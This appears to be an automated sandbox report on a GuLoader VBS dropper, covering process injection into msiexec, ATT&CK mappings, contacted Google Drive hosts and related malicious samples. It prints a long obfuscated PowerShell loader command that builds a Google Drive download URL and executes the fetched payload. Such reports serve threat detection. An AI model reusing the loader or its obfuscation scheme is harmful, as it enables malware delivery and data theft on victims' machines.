              Source: Yara match File source: Process Memory Space: powershell.exe PID: 6288, type: MEMORYSTR
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread APC queued: target process: C:\Windows\SysWOW64\msiexec.exe
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\SysWOW64\msiexec.exe base: 3C60000
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Tnkningen Acnes udgangsstrm Lakfernisens Svigefuldere Poplesie Nonpardoning #>;$Harlequinic9='Faineant';<#Binit Reveree Opnaaes #>;$Stooled=$Anapstiske+$host.UI; function Katabolize($bevaringernes){If ($Stooled) {$Procenttegnet++;}$Reassignments=$Diamantsliberes+$bevaringernes.'Length'-$Procenttegnet; for( $Forhekselserne=5;$Forhekselserne -lt $Reassignments;$Forhekselserne+=6){$Proempiricist=$Forhekselserne;$Oversigstabeller+=$bevaringernes[$Forhekselserne];$Udslg120='Telepatis';}$Oversigstabeller;}function Salvierne($Dedentition){ . ($Tdlens) ($Dedentition);}$Diskettestrelserne=Katabolize 'ThesaMPa mio dru zVoldgiBud.ilBurgulSpdetaKbest/Mi nn ';$Klaner='Forda[Shri NFem ieIndtjTFaddl.tantas akebeGe atRwatc,VPo taITotnecMonureDativpGenfuOFiberi UnsiNHen.iTCoticmHo.ltA UncoN F.rsALrke GSpnd EDosshROmgaa]Eskim:Cot a:Pose SUnde.e KvitCProg UO,erirD ughIRundetF rsdyL.ksePOdiumrRet.roHippeTIn ulOM rtyC nonsoKnaldlNonne vuls=Bior ';$Diskettestrelserne+=Katabolize 'Doxog5Strin.Wittd0Cardi Rejs(genneWTrilli FortnCoudrd togeoUnc mwUnsoosRekla BaudrNTr.glT Spag Prakt1Tel,s0 Ansk.Afdan0 uber; Ob.c AflaaWSs eriWhirlnPatos6 Oil.4 macr;Vrtdy Str fxEcba 6Velge4Infri;Decid FlyvrKompovA,jac: Besc1Klipd3Indsp1Fremt.Gensk0boome)rehea DesenGCyanoePre ocKlaphk Me ioGlams/U sco2Gri l0A mbe1o.skr0.rimi0.elik1Humrs0Pseud1Campe SlvbrFComi i T anrIllege Jordf xpreoSlavixAntom/Tendr1Unr c3Tipol1 Funk.Aflir0aut s ';$Klaner+=' Mosa[ Di gNUnknoEGonapTDistr.TypifsSchisEVels.cRansauPa narBevikIFirbltMonadY i plpAppenRhe aaOUdmaat VocaOisenkc FingopreuslPerloT EnhuYSnohaPD milEP,nti] Attr ';$Udekampenes=Katabolize ' S,lvU DispSProgrE SkolrTeglt-Tub pAbeklaGParasEMaskoNIrgrnTkrimi ';$Achinese=Katabolize 'MicrohSlaantMusett NeoppSvlges Stra:Beher/Varme/Pulved acrorAfdrai Mumiv likke Lder.usandgFairboTr 
ldoConvogSor klAdskieVindi. befcFyldooEvangmPha,a/Anomaupron cRandp?Drivhe strax ResopF lskoHuastrFattitKunde=SokkedFornro,eathwHalakncykell Fondo em haRastld Chl &Tarwoi PiradCallb=i,dit1hottoDSkrifRAarpexSailo- Pres4 andf-Haan skamm,5Sn wb-Diale4 Revn2ExedreMars,c Over5ostre5,emervR.gnfnFrid F SukkOover O Fr sk BagtcDibblNDemagRBodegWBra,dqStrom_Majeux Sen.p A thfVende4,ncureOr el ';$Unprincipal=Katabolize ' Halv> avl ';$Tdlens=Katabolize 'TopkiIFod.aEStr,tXLogom ';$Slideproof='Nkke';$Klaner+='Vaes.:Anstu:SkrivT rainLE uiasDuvet1Promi2Empa. ';$sysker='\Solidifiable.Sch';Salvierne (Katabolize 'Qu en$Underg SettLSabbaO Ca cb.tgjaaPsychLRges,:Srligv ogheE DefesKurert P steBlommuCarnaR L ssoFlycapTorskETransrPolessSpr,g= upe$SporaEStudenMundtvAtomf: SupeAungulp CampPC ystDHaystaHjemltUnz,pA Smaa+Helti$Trosas Eft Y uaegSNonilkFastgeD rsiRLokal ');Salvierne (Katabolize ' ioke$MatroGunswaLRefu ORe isBDrejnAAna klSt,pf:Vomitc DistHReligAI dekiuncreR KoncmTetraEPressNIllusDHunfyi JarnnKo rsGSpec = Siev$ IndgA lalCZoophhEde,hi RewanUncanERverisUncofEDagkJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
              Source: unknown Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" with the same obfuscated command line as the wscript.exe entry above (lowercased)
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
              Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
              Gather Victim Identity Information | 221 Scripting | Valid Accounts | 1 Windows Management Instrumentation | 221 Scripting | 311 Process Injection | 1 Masquerading | OS Credential Dumping | 1 Security Software Discovery | Remote Services | 1 Archive Collected Data | 11 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
              Credentials | Domains | Default Accounts | 2 Command and Scripting Interpreter | 1 DLL Side-Loading | 1 DLL Side-Loading | 21 Virtualization/Sandbox Evasion | LSASS Memory | 1 Process Discovery | Remote Desktop Protocol | Data from Removable Media | 1 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
              Email Addresses | DNS Server | Domain Accounts | 1 Exploitation for Client Execution | Logon Script (Windows) | Logon Script (Windows) | 311 Process Injection | Security Account Manager | 21 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
              Employee Names | Virtual Private Server | Local Accounts | 2 PowerShell | Login Hook | Login Hook | 2 Obfuscated Files or Information | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 13 Application Layer Protocol | Traffic Duplication | Data Destruction
              Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Software Packing | LSA Secrets | 1 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
              Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | 13 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
              [Behavior graph: ID 1542324, Sample: RFQ_24196MR_PDF.vbs, Start date: 25/10/2024, Architecture: WINDOWS, Score: 100]
              [Process nodes in the graph: wscript.exe started powershell.exe, which started conhost.exe; a second powershell.exe started msiexec.exe and conhost.exe; msiexec.exe started WerFault.exe]

              Source | Detection | Scanner | Label | Link
              RFQ_24196MR_PDF.vbs | 32% | ReversingLabs | Script.Trojan.GuLoader |
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              Source | Detection | Scanner | Label | Link
              http://nuget.org/NuGet.exe | 0% | URL Reputation | safe |
              http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe |
              https://go.micro | 0% | URL Reputation | safe |
              https://contoso.com/License | 0% | URL Reputation | safe |
              https://contoso.com/Icon | 0% | URL Reputation | safe |
              http://crl.micro | 0% | URL Reputation | safe |
              https://contoso.com/ | 0% | URL Reputation | safe |
              https://nuget.org/nuget.exe | 0% | URL Reputation | safe |
              https://aka.ms/pscore68 | 0% | URL Reputation | safe |
              https://apis.google.com | 0% | URL Reputation | safe |
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe |
              Name | IP | Active | Malicious | Antivirus Detection | Reputation
              drive.google.com | 142.250.185.238 | true | false | | unknown
              drive.usercontent.google.com | 172.217.16.193 | true | false | | unknown
              Name | Source | Malicious | Antivirus Detection | Reputation
              http://nuget.org/NuGet.exe | powershell.exe, 00000001.00000002.1939147276.000001DEEBB8F000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
              http://drive.usercontent.google.com | powershell.exe, 00000001.00000002.1908818766.000001DEDDC56000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1908818766.000001DEDC0E1000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
              http://pesterbdd.com/images/Pester.png | powershell.exe, 00000001.00000002.1908818766.000001DEDBD47000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
              http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000001.00000002.1908818766.000001DEDBD47000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
              https://go.micro | powershell.exe, 00000001.00000002.1908818766.000001DEDCA70000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
              https://drive.usercontent.google.com( | powershell.exe, 00000001.00000002.1908818766.000001DEDC0E1000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
              https://contoso.com/License | powershell.exe, 00000001.00000002.1939147276.000001DEEBB8F000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
              https://contoso.com/Icon | powershell.exe, 00000001.00000002.1939147276.000001DEEBB8F000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
              https://drive.usercontent.googh | powershell.exe, 00000001.00000002.1908818766.000001DEDDC3E000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
              https://drive.usercontent.google.com/ | msiexec.exe, 00000008.00000002.2423629116.000000000586A000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
              http://drive.google.com | powershell.exe, 00000001.00000002.1908818766.000001DEDC0E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1908818766.000001DEDDC18000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
              https://drive.google.com/5f | msiexec.exe, 00000008.00000002.2423629116.000000000586A000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
              https://github.com/Pester/Pester | powershell.exe, 00000001.00000002.1908818766.000001DEDBD47000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
              https://www.google.com | powershell.exe, 00000001.00000002.1908818766.000001DEDC04B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1908818766.000001DEDC047000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1908818766.000001DEDDC3E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1908818766.000001DEDDC3A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1908818766.000001DEDDC18000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1908818766.000001DEDC02E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2197438955.00000000058E4000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2197578225.00000000058E4000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
              https://drive.google.com/=f | msiexec.exe, 00000008.00000002.2423629116.000000000586A000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
              https://drive.googPR | powershell.exe, 00000001.00000002.1908818766.000001DEDD63B000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
              http://crl.micro | powershell.exe, 00000006.00000002.2123074697.0000000007201000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
              https://aka.ms/pscore6lBdq | powershell.exe, 00000006.00000002.2093208031.00000000045F1000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
              https://contoso.com/ | powershell.exe, 00000001.00000002.1939147276.000001DEEBB8F000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
              https://nuget.org/nuget.exe | powershell.exe, 00000001.00000002.1939147276.000001DEEBB8F000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
              https://drive.google.com | powershell.exe, 00000001.00000002.1908818766.000001DEDBD47000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1908818766.000001DEDD63B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1908818766.000001DEDC05D000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
              https://drive.usercontent.google.com | powershell.exe, 00000001.00000002.1908818766.000001DEDC04B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1908818766.000001DEDDC3E000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
              https://aka.ms/pscore68 | powershell.exe, 00000001.00000002.1908818766.000001DEDBB21000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
              https://apis.google.com | powershell.exe, 00000001.00000002.1908818766.000001DEDC04B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1908818766.000001DEDC047000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1908818766.000001DEDDC3E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1908818766.000001DEDDC3A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1908818766.000001DEDDC18000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1908818766.000001DEDC02E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2197438955.00000000058E4000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2197578225.00000000058E4000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.1908818766.000001DEDBB21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2093208031.00000000045F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
IP | Domain | Country | ASN | ASN Name | Malicious
172.217.16.193 | drive.usercontent.google.com | United States | 15169 | GOOGLEUS | false
142.250.185.238 | drive.google.com | United States | 15169 | GOOGLEUS | false
                                              Joe Sandbox version:41.0.0 Charoite
                                              Analysis ID:1542324
                                              Start date and time:2024-10-25 19:42:21 +02:00
                                              Joe Sandbox product:CloudBasic
                                              Overall analysis duration:0h 6m 32s
                                              Hypervisor based Inspection enabled:false
                                              Report type:full
                                              Cookbook file name:default.jbs
                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                              Number of analysed new started processes analysed:13
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:0
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Sample name:RFQ_24196MR_PDF.vbs
                                              Detection:MAL
                                              Classification:mal100.troj.expl.evad.winVBS@9/11@2/2
                                              EGA Information:Failed
                                              HCA Information:
                                              • Successful, ratio: 80%
                                              • Number of executed functions: 41
                                              • Number of non-executed functions: 24
                                              Cookbook Comments:
                                              • Found application associated with file extension: .vbs
                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                              • Excluded IPs from analysis (whitelisted): 20.42.65.92
                                              • Excluded domains from analysis (whitelisted): onedsblobprdeus17.eastus.cloudapp.azure.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, login.live.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                              • Execution Graph export aborted for target powershell.exe, PID 6288 because it is empty
                                              • Execution Graph export aborted for target powershell.exe, PID 7100 because it is empty
                                              • Not all processes where analyzed, report is missing behavior information
                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                              • VT rate limit hit for: RFQ_24196MR_PDF.vbs
Time | Type | Description
13:43:18 | API Interceptor | 119x Sleep call for process: powershell.exe modified
13:44:26 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
                                              No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
3b5074b1b5d032e5620f69f9f700ff0e | 3coxOaV92n.exe | malicious | ScreenConnect Tool | 142.250.185.238, 172.217.16.193
3b5074b1b5d032e5620f69f9f700ff0e | khwHsyfsJ1.exe | malicious | ScreenConnect Tool | 142.250.185.238, 172.217.16.193
3b5074b1b5d032e5620f69f9f700ff0e | Qjq85KfhBC.exe | malicious | ScreenConnect Tool | 142.250.185.238, 172.217.16.193
3b5074b1b5d032e5620f69f9f700ff0e | 96r3GgxntQ.exe | malicious | ScreenConnect Tool | 142.250.185.238, 172.217.16.193
3b5074b1b5d032e5620f69f9f700ff0e | e5mSvqt7Ho.exe | malicious | ScreenConnect Tool | 142.250.185.238, 172.217.16.193
3b5074b1b5d032e5620f69f9f700ff0e | xrWUzly94Z.exe | malicious | ScreenConnect Tool | 142.250.185.238, 172.217.16.193
3b5074b1b5d032e5620f69f9f700ff0e | EPCo9k8NIn.exe | malicious | ScreenConnect Tool | 142.250.185.238, 172.217.16.193
3b5074b1b5d032e5620f69f9f700ff0e | X5zNv1VJia.exe | malicious | ScreenConnect Tool | 142.250.185.238, 172.217.16.193
3b5074b1b5d032e5620f69f9f700ff0e | AmedVA2n92.exe | malicious | ScreenConnect Tool | 142.250.185.238, 172.217.16.193
3b5074b1b5d032e5620f69f9f700ff0e | 3coxOaV92n.exe | malicious | ScreenConnect Tool | 142.250.185.238, 172.217.16.193
37f463bf4616ecd445d4a1937da06e19 | https://23.245.109.208.host.secureserver.net/E5V7V5K0D7J7U1G8T1M8U3B4G7B4C0Y7M4M4N1J5K4K6Y6N5R4&c=E,1,OlGTQS9-XwC2vBMWr7I6ylXZJam5iCAEz8vCZAxOsyVrFii_1IhqZZqiTz_dLP-ondxd1F0_mQoffiXjC_RNTQQ_48xVwrK55zuEfYrxqUa2Wr6UOEIpqcM,&typo=1 | malicious | Unknown | 142.250.185.238, 172.217.16.193
37f463bf4616ecd445d4a1937da06e19 | https://23.245.109.208.host.secureserver.net/E5V7V5K0D7J7U1G8T1M8U3B4G7B4C0&c=E,1,2fln-18Rcg-_y13WFwFZvQn3f1CXlYk0J_eiM8RKZuA6Djx49SsFA5in1hnyQJXLjWW1L6y7WaZ9eFSqcAvQerMcOF3C93rx-F5tfSihNA,,&typo=1 | malicious | Unknown | 142.250.185.238, 172.217.16.193
37f463bf4616ecd445d4a1937da06e19 | oNL2jSvLHj.exe | malicious | Stealc, Vidar | 142.250.185.238, 172.217.16.193
37f463bf4616ecd445d4a1937da06e19 | Certificado FNMT-RCM.exe | malicious | GuLoader, Snake Keylogger | 142.250.185.238, 172.217.16.193
37f463bf4616ecd445d4a1937da06e19 | COMPROBANTE DE PAGO.exe | malicious | AgentTesla, GuLoader | 142.250.185.238, 172.217.16.193
37f463bf4616ecd445d4a1937da06e19 | Justificante.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | 142.250.185.238, 172.217.16.193
37f463bf4616ecd445d4a1937da06e19 | n#U00ba 7064-2024.exe | malicious | GuLoader, Snake Keylogger | 142.250.185.238, 172.217.16.193
37f463bf4616ecd445d4a1937da06e19 | Factura 1-014685.pdf.exe | malicious | GuLoader, Snake Keylogger | 142.250.185.238, 172.217.16.193
37f463bf4616ecd445d4a1937da06e19 | PILNE ZAPYTANIE RFQ-05567-2024.10.25.vbs | malicious | GuLoader, Snake Keylogger, VIP Keylogger | 142.250.185.238, 172.217.16.193
37f463bf4616ecd445d4a1937da06e19 | Factura n#U00baB-2542.exe | malicious | GuLoader, Snake Keylogger | 142.250.185.238, 172.217.16.193
                                              No context
                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):65536
                                              Entropy (8bit):1.1148734766408668
                                              Encrypted:false
                                              SSDEEP:192:UJonW8UMgT0BU/YjeTipG/zuiFUZ24IO8QR:up8UMgABU/YjeX/zuiFUY4IO8QR
                                              MD5:D83E58F2B2A83A8557BA24F0DB1FE1E7
                                              SHA1:C5198ADE91ECF7CBAAC519EF97713D2DBDFC13E9
                                              SHA-256:6BE475A7200CD0179549A3B02FCDF13D9AD76F10A3CC8DFF5DD2439A28998A6F
                                              SHA-512:83F23E8954BEF515263B37D490DEA0719D0649C8082DB0F6BD2271E2B2EEF0479231FCF1562560A65B0E6A376786E309A861CDC8FB66343ACA57161429B7F9B3
                                              Malicious:false
                                              Reputation:low
                                              Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.4.3.5.1.8.5.3.0.7.5.5.6.3.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.4.3.5.1.8.5.3.6.3.8.0.5.4.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.c.e.d.5.1.d.f.-.f.6.1.f.-.4.f.e.a.-.9.9.8.0.-.4.e.b.0.a.c.a.9.4.c.3.1.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.b.c.8.1.2.1.e.-.6.e.9.3.-.4.b.3.e.-.8.3.5.9.-.b.d.7.3.7.f.3.0.d.5.1.d.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.m.s.i.e.x.e.c...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.m.s.i.e.x.e.c...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.f.f.c.-.0.0.0.1.-.0.0.1.4.-.3.d.7.b.-.9.5.7.5.0.5.2.7.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.1.d.0.c.7.c.f.c.a.8.1.0.4.d.0.6.d.e.1.f.0.8.b.9.7.f.2.8.b.3.5.2.0.c.2.4.6.c.d.
                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                              File Type:Mini DuMP crash report, 14 streams, Fri Oct 25 17:44:13 2024, 0x1205a4 type
                                              Category:dropped
                                              Size (bytes):175311
                                              Entropy (8bit):3.029085225706622
                                              Encrypted:false
                                              SSDEEP:768:HjR2O85d3YAsVBFnBpNNFWt0zE2vrvC6hkQKnffwz+HLTggjV6l87OkCx7+LHUaQ:9NbpN4uE2aOkho+LTgFkCCDUamfqUM8
                                              MD5:D38F7A9AE3C75BAA6069F764B576D081
                                              SHA1:2440776828D9788070C8BB32442B1F1656040F88
                                              SHA-256:6BB54C0D4C22A0FD97FDA86EDA3FE401805BD84850B7D9E661E6220AB6B69569
                                              SHA-512:27189C8597D7C3B4B269A7623A65B4C34387379444C7473C2EE07359CF38A5CC95A5166A19679408E78013B3B2504342201A4543FE94EDFD65B420F1AD448657
                                              Malicious:false
                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):6336
                                              Entropy (8bit):3.723142130973932
                                              Encrypted:false
                                              SSDEEP:96:RSIU6o7wVetbqY6iYJ4xuQE/Pfu5aM4Ur89bERsfyLRsm:R6l7wVeJqY6iYJ40Kprr89bERsfWsm
                                              MD5:1C0316EB67D3FFB03C36F5809730037E
                                              SHA1:BF2D9EC8947FE80663F93ACA73527EBE88AE72CD
                                              SHA-256:4CA7F17AC76335B356FD51DFF9444FC6AB8EC435EFA760288DC86C549F3E105E
                                              SHA-512:5C19308E801090233BFB252C0D32CB3AAF78C2591E5A4490D0B973AD5BBFAB9A71BB34E54D0904E95E62EAC4CC193BBDEC53640F9F6953BA033A49E1B9D16C67
                                              Malicious:false
                                              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.0.9.2.<./.P.i.
                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):4654
                                              Entropy (8bit):4.474186248713216
                                              Encrypted:false
                                              SSDEEP:48:cvIwWl8zslJg77aI95eWpW8VYxPYm8M4JdjF9b+q85mxEFh/d:uIjf/I73f7VESJ1bzEFh/d
                                              MD5:D544C11565A68A3CABB7DA6429BA9F31
                                              SHA1:A85605967B0F4AD8C04320B314B5BC93F52DDEAB
                                              SHA-256:55280FF2CE4F98DF7898E2ABA34929C446A2E57A365D6E323F43C599B0CAB391
                                              SHA-512:0EDC440C4914DB2FE430E9DD3AD9177F611B98F35CB8862D9A417E6BF46B09B1B021F6675C986B9193BF3F93E62895C1ADD3A9B562387554CECC2862520A6359
                                              Malicious:false
